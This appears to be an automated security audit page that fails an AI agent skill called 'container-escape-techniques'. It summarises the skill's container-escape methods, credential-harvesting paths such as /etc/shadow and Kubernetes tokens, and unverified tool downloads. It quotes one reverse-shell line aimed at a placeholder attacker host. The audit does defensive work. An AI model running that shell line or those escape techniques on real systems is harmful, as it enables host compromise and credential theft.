container-escape-techniques
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONCREDENTIALS_UNSAFEREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: Provides comprehensive instructions for escaping container isolation using nsenter, mount, and chroot to gain unauthorized access to the host's filesystem and process space.\n- [DATA_EXFILTRATION]: Includes templates for setting up reverse shells via cron jobs (bash -i >& /dev/tcp/ATTACKER/4444) and instructions for reading sensitive host system files like /etc/shadow.\n- [CREDENTIALS_UNSAFE]: Lists specific paths and commands for harvesting Kubernetes service account tokens, cluster certificates, and host SSH authorized_keys for credential theft and lateral movement.\n- [REMOTE_CODE_EXECUTION]: Documents advanced techniques for host process injection using ptrace and leveraging the cgroup release_agent mechanism to execute arbitrary malicious scripts on the host.\n- [EXTERNAL_DOWNLOADS]: Recommends the retrieval and execution of various external security tools (e.g., deepce.sh, CDK, amicontained) for automated discovery of escape vectors without integrity verification.
Recommendations
- AI detected serious security threats
Audit Metadata